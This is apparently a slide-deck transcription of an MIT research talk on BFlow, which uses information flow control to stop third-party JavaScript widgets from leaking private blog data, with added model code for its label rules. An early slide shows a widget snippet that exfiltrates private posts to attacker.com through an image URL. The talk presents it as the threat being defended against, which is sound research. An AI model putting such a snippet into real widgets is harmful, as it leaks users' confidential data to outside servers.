Privacy-Preserving Browser-Side Scripting With BFlow
Alexander Yip, Neha Narula, Maxwell Krohn, Robert Morris
Massachusetts Institute of Technology
Web Sites Support 3rd Party JavaScript Extensions
Snippets of the last few blog posts
Display the last few reader comments
• Blogger.com supports “widgets” – read and modify blog posts
Confidential Blogs Are Vulnerable to 3rd Party JavaScript
A 3rd Party JavaScript Leak Attack
Widget’s JavaScript source code:

    private_data = document.getElementById("posts");
    widget.innerHTML = private_data;
    widget.innerHTML += '<IMG SRC=http://attacker.com/' + private_data + '.gif>';

[Slide figure: Alice’s browser runs Blogger JS + Attacker JS; the widget sends “HTTP Request: GET /sell_pet_food_online.gif HTTP/1.0” to the attacker.com server]
Widget has access to private blog content
Widget leaks private blog content to attacker.com
• Blogger.com wants to provide data to widgets
• Browser security policy permits JS to send data freely
• Wrote a malicious blogger.com widget in one hour
Shows private blog content in widget’s box
Problem: Extensibility vs. Privacy
[Slide figure: a webmail page with two 3rd party widgets, Dan’s Spell Checker (“Check Spelling!”) and Joe’s Encryption Widget (“Encrypt Mail” / “Decrypt Mail”), showing an encrypted message body]
(Choose one)
• Either choose cool extensibility features – e.g. Blogger.com widgets
• Or choose privacy and no 3rd party code – e.g. Gmail
Solution: BFlow
• Eliminate the choice between features & privacy
• Add information flow control (IFC)
– To JavaScript in the browser
– Track private data inside the browser and server
• Prohibit communication that leaks private data
Challenges
• Fit JavaScript environment into an IFC model
– Preserve JavaScript communication channels
– Mashups with private data
[Slide figure: a frame holding a private address can send to the top-level frame or to a sub-frame; a mashup fetches from the Google Maps Server]
• Easy to adopt
– Minimize changes to JS that uses existing communication channels
– Minimize changes required on the server
– Easy for end-users to start using
Contributions
• An IFC model for the JS runtime environment
• Easy to deploy and adopt implementation
– Installs in browser with 2 clicks
– Requires no changes to JavaScript interpreter
• Only small changes to JavaScript communication API
• A platform that supports real blogger.com widgets
BFlow Overview
[Slide figure: the Browser Reference Monitor separates a Trusted Protection Zone from Untrusted Protection Zones; the Blog Web Server and the attacker.com Server sit outside the browser]
• Blog Server supplies some HTML/JS
• Blog Server “labels” private data with a “tag”
• 3rd Party supplies widget HTML/JS
• Reference Monitor knows when a zone reads private data
• A zone that has read it carries the label “Saw Alice’s private data”
BFlow Overview
[Slide figure: Browser Reference Monitor, Blog Web Server, attacker.com Server and Google Maps Server]
• Have not seen private data: can send requests to any server
• Have seen private data: can only send requests to the data’s server
• Declassification: fetch map image from Google Maps, OK!
• BFlow prevents the malicious widget from leaking private data
Design Outline
• Tags and Labels
• Protection Zones
• Reference Monitor
• Server
Tags And Labels
• A label is a set of tags
– Describes what private data an object contains
– Each zone, HTTP request, and response has a label
• Each tag identifies a kind of private data
– Alice’s tag: blogger.com:alice
– Bob’s tag: blogger.com:bob
• e.g. Alice’s blog has label L={blogger.com:alice}
Data Flow Rule
• Data may flow only if Ldata ⊆ Lreceiver

Data Label   Receiver Label   May Receive?
{x}          {x,y}            Yes
{x}          {}               No

[Slide figure: data with label Ldata flowing to a receiver (JavaScript) with label Lreceiver]
Protection Zones
• A zone is a group of browser HTML <frames>
– Regular JavaScript runs inside a frame inside a zone
– All frames in a zone share the same label
• Trusted zone
– Top-level frame is in the site’s trusted zone
– Contains JavaScript written only by the site’s developers
– Need not abide by information flow restrictions
• Untrusted zones
– Contain 3rd party JavaScript
– Must abide by information flow restrictions
Example Zones & Labels
[Slide figure: Trusted Zone (no label); Zone A L={}; Zone B L={blogger.com:alice}; Zone C L={}; Zone D L={blogger.com:alice}]
How Do Untrusted Zones Get Labels?
[Slide figure: Blog Web Server and Browser Reference Monitor; an untrusted zone’s label changes from L={} to L={blogger.com:alice}]
• Trusted zone sets untrusted zone’s label
augment_label(blogger.com:alice)
Works With Existing JS Channels
• Channel 1: A frame can always send to its child frame
– Lparent ⊆ Lchild
• Channel 2: A frame can always send to the top-level frame
– To avoid leaking data, untrusted zones may contain only tags from the web site in the top-level frame
[Slide figure: web page showing inherent JavaScript channels. Top-level frame from X.com; Frame 1 L={X.com:A}; Frame 2 L={X.com:A, X.com:B}]
– Frame 1 may not add X.com:C to its label
– No sub-frame from X.com may add a tag from Y.com
Why Zones Instead Of Frames?
• Some JavaScript consists of multiple frames
• Group JavaScript into modules by label
– All frames in the same zone can always communicate
– Trusted JavaScript sets the label of a multi-frame widget only once
– Existing multi-frame widgets need not coordinate label changes
e.g. Cbox chat widget
Bottom frame writes messages to top frame
BFlow’s JavaScript Model
• All JavaScript will work if the IFC rules allow
– AJAX, eval()
• The IFC rule (Ldata ⊆ Lreceiver) affects
– access to DOM variables & cookies
– postMessage(), fragment-ID messages
– HTTP requests and responses
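The label, zone and channel rules from the preceding slides (the data flow rule Ldata ⊆ Lreceiver, augment_label, and the two inherent channels) as a runnable model. This is an added example written for this page, not BFlow’s own code; the monitor object, the `site` field and the zone names are constructed here, while tags follow the slides’ `site:name` convention.

```javascript
// Added example, not BFlow's own code: a small model of BFlow's labels, zones,
// augment_label and the two inherent JavaScript channels, following the rules
// on the slides. Tag strings such as "blogger.com:alice" use the slides'
// convention; the monitor object, the `site` field and the zone names are
// constructed for this example.

// Data flow rule: L_data may flow to a receiver only if L_data ⊆ L_receiver.
function isSubset(a, b) {
  for (const tag of a) if (!b.has(tag)) return false;
  return true;
}

// The reference monitor remembers which web site owns the top-level frame.
function makeMonitor(site) {
  return { site, zones: [] };
}

// A zone is a group of frames that share one label. The trusted zone holds
// the site's own JavaScript, carries no label and is exempt from the rule.
function makeZone(monitor, name, { trusted = false, parent = null } = {}) {
  const zone = { name, trusted, parent, label: new Set() };
  monitor.zones.push(zone);
  return zone;
}

// The trusted zone sets an untrusted zone's label by adding a tag. Two checks
// keep the inherent channels safe:
//  - Channel 2 (any frame can send to the top-level frame): an untrusted zone
//    may only hold tags of the site in the top-level frame.
//  - Channel 1 (a parent can always send to its child frame): L_parent ⊆
//    L_child must keep holding, so a tag that a child zone lacks is refused.
function augmentLabel(monitor, caller, zone, tag) {
  if (!caller.trusted || zone.trusted) return false;
  const tagSite = tag.split(':')[0];
  if (tagSite !== monitor.site) return false;
  const children = monitor.zones.filter(z => z.parent === zone);
  if (children.some(child => !child.label.has(tag))) return false;
  zone.label.add(tag);
  return true;
}

// Browser-side channels between zones (postMessage, fragment IDs, DOM access
// mediated by the monitor): the trusted zone is exempt, any zone may send to
// the top-level frame, and untrusted-to-untrusted flow needs L_sender ⊆ L_receiver.
function mayZoneSend(sender, receiver) {
  if (sender.trusted || receiver.trusted) return true;
  return isSubset(sender.label, receiver.label);
}

// Walk-through mirroring the "Example Zones & Labels" slide.
function demo() {
  const m = makeMonitor('blogger.com');
  const T = makeZone(m, 'trusted', { trusted: true });
  const A = makeZone(m, 'A', { parent: T });           // stays at L = {}
  const B = makeZone(m, 'B', { parent: T });
  const Bsub = makeZone(m, 'B-subframe', { parent: B });
  augmentLabel(m, T, Bsub, 'blogger.com:alice');       // child first, so L_B ⊆ L_Bsub holds
  augmentLabel(m, T, B, 'blogger.com:alice');          // L_B = {blogger.com:alice}
  return {
    emptyToLabeled: mayZoneSend(A, B),                            // true
    labeledToEmpty: mayZoneSend(B, A),                            // false: would leak
    labeledToTopLevel: mayZoneSend(B, T),                         // true
    foreignTagRefused: augmentLabel(m, T, A, 'attacker.com:x'),   // false
    parentAheadOfChild: augmentLabel(m, T, B, 'blogger.com:bob'), // false: Bsub lacks it
    labelOfB: [...B.label].join(','),                             // 'blogger.com:alice'
  };
}
```

The order of the two augment_label calls in `demo` matters: labeling the sub-frame zone before its parent keeps Lparent ⊆ Lchild true at every step, which is exactly the invariant the “Frame 1 may not add X.com:C” example on the slide protects.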
HTTP Request Rules
• Trusted zone T
– can send to any server (always)
– can receive a response from any server (always)
• Untrusted zone Z
– can send to the server where secret data came from (always)
  • can receive the response (when Lresponse ⊆ LZ)
– can send to 3rd party server E (when LZ = {})
  • or when the web site has a declassification exception for (server E, URL)
  • can receive the response (always)
The BFlow Server API
• Propagate label from HTTP requests to responses
– Read label contained in each request
– Attach the label to any response that uses labeled data
[Slide figure: Zone A (L={blogger.com:alice}) sends “HTTP Request: POST save_post?content=sell_petfood_online” with label L = {blogger.com:alice} to the Blog Web Server; the server returns “HTTP Response Contents: sell_petfood_online” with label L = {blogger.com:alice} to Zone B (L={blogger.com:alice})]
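The HTTP request rules and the server API from the two preceding slides as a runnable model, replaying the leak attack from the opening slides under the reference monitor. This is an added example written for this page, not BFlow’s own code; the server names, the declassification exception list, the request/response objects and the in-memory post store are constructed here.

```javascript
// Added example, not BFlow's own code: a model of the HTTP request rules and
// of the server API ("propagate label from request to response") described
// on the slides. The server names, the declassification exception list, the
// request/response objects and the in-memory post store are constructed here.

function isSubset(a, b) {
  for (const tag of a) if (!b.has(tag)) return false;
  return true;
}

// Every tag is "site:name", so a zone's label names the servers its private
// data came from.
function serversInLabel(label) {
  return new Set([...label].map(tag => tag.split(':')[0]));
}

// Browser reference monitor: may zone Z send a request to `server` for `url`?
//  - the trusted zone T may always send;
//  - an untrusted zone may always send to the server its secret data came from;
//  - with an empty label it may send anywhere;
//  - otherwise only if the site declared a declassification exception for
//    exactly this (server, url), e.g. fetching a map image from Google Maps.
function maySendRequest(zone, server, url, exceptions) {
  if (zone.trusted) return true;
  if (serversInLabel(zone.label).has(server)) return true;
  if (zone.label.size === 0) return true;
  return exceptions.some(e => e.server === server && e.url === url);
}

// May zone Z receive a response? Trusted: always. Untrusted: only when
// L_response ⊆ L_Z. A third-party server outside BFlow returns an empty
// label, so its responses are always accepted, as the slides state.
function mayReceiveResponse(zone, responseLabel) {
  if (zone.trusted) return true;
  return isSubset(responseLabel, zone.label);
}

// Server side (constructed blog server): read the label on each request and
// attach it to any response built from labeled data.
const postStore = new Map();

function handleSavePost(request) {
  postStore.set(request.params.id, {
    content: request.params.content,
    label: new Set(request.label),
  });
  return { status: 200, body: 'saved', label: new Set(request.label) };
}

function handleGetPost(request) {
  const post = postStore.get(request.params.id);
  if (!post) return { status: 404, body: '', label: new Set() };
  return { status: 200, body: post.content, label: new Set(post.label) };
}

function makeZone(name, tags, trusted = false) {
  return { name, trusted, label: new Set(tags) };
}

// Scenario: the malicious widget from the first slides, replayed under the rules.
function runScenario() {
  const exceptions = [{ server: 'maps.google.com', url: '/map.png' }]; // constructed
  const T = makeZone('trusted', [], true);
  const fresh = makeZone('A', []);                       // has not seen private data
  const widget = makeZone('B', ['blogger.com:alice']);   // has seen Alice's post

  // The widget saves a post through the blog server; the request carries L_B,
  // and the server echoes that label on the stored post.
  const saveResp = handleSavePost({
    label: widget.label,
    params: { id: 'p1', content: 'sell_petfood_online' },
  });
  const getResp = handleGetPost({ label: fresh.label, params: { id: 'p1' } });

  return {
    leakBlocked: maySendRequest(widget, 'attacker.com', '/sell_pet_food_online.gif', exceptions), // false
    freshMayContactAnyone: maySendRequest(fresh, 'attacker.com', '/x.gif', exceptions),            // true
    widgetMayContactBlog: maySendRequest(widget, 'blogger.com', '/save_post', exceptions),          // true
    mapImageDeclassified: maySendRequest(widget, 'maps.google.com', '/map.png', exceptions),        // true
    otherMapUrlRefused: maySendRequest(widget, 'maps.google.com', '/other', exceptions),            // false
    trustedUnrestricted: maySendRequest(T, 'attacker.com', '/x.gif', exceptions),                   // true
    savedLabel: [...saveResp.label].join(','),                                                      // 'blogger.com:alice'
    freshMayReadPost: mayReceiveResponse(fresh, getResp.label),                                     // false
    widgetMayReadPost: mayReceiveResponse(widget, getResp.label),                                   // true
  };
}
```

The two halves check each other: the server never decides who may see a post, it only carries the label through, and the browser-side monitor refuses the labeled response to a zone whose label does not cover it, which is what stops a widget that has read Alice’s post from reaching attacker.com.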
BFlow Implementation
Browser Reference Monitor
Firefox Extension, 1100 lines of code
Users can install with 2 clicks
JavaScript communication API
changed slightly
No changes to JavaScript interpreter
Zone Isolation
[Slide figure: two zones with domain names Zone1.blogger and Zone2.blogger; no direct communication between them]
• Repurpose browser’s same-origin policy (SOP)
– Zones communicate via reference monitor
– SOP is conservative: no DOM read/write across zones even if labels would allow
Applications
• BF-Socialnet
– Social network that supports 3rd party JS extensions
– Protects private user data (see paper)
• BFlogger
– Blog mockup that supports blogger.com widgets
– Ported 12 existing widgets to BFlogger
BFlow Preserves Privacy
• Wrote a malicious Blogger.com widget
– Successfully leaks data from confidential blogs
• Ported widget to BFlogger
– BFlow prevents malicious widget from leaking data
[Slide figure: attacker.com Server; no requests to attacker.com after reading private data]
BFlow Runs Existing JavaScript
Widget           Lines of Code   Lines Changed   Uses Secret Data?
Twitter                     25               0   No
Flickr                      10               0   No
Buzz                         1               0   No
Youtube                   1982               0   No
Calendar                  1945               0   No
Weather                   3790               0   No
Popular Posts               16               1   Yes
Commenters                  15               1   Yes
Recent Posts                74               2   Yes
Random Post                 34               2   Yes
Cbox-chat                  801              89   Yes

Cbox-chat: lines changed is high because we made Chat store data on the BFlow server to protect chat data
• Better privacy with little or no changes
Existing Research
• Can’t grant read access without also leaking [MashupOS]
• Requires rewriting JavaScript & manual jail config [Caja]
• Don’t support untrusted JavaScript [Swift, SIF]
• User must make disclosure decisions [NoMoXSS]
• Certificates [Java]
Conclusion
• 3rd party JavaScript can leak confidential user data
• BFlow provides a new web security model
– Tracks information flow between client & server
– 3rd party JavaScript can safely compute and display
– Enables new features in web sites
• e.g. 3rd party Gmail extensions
Questions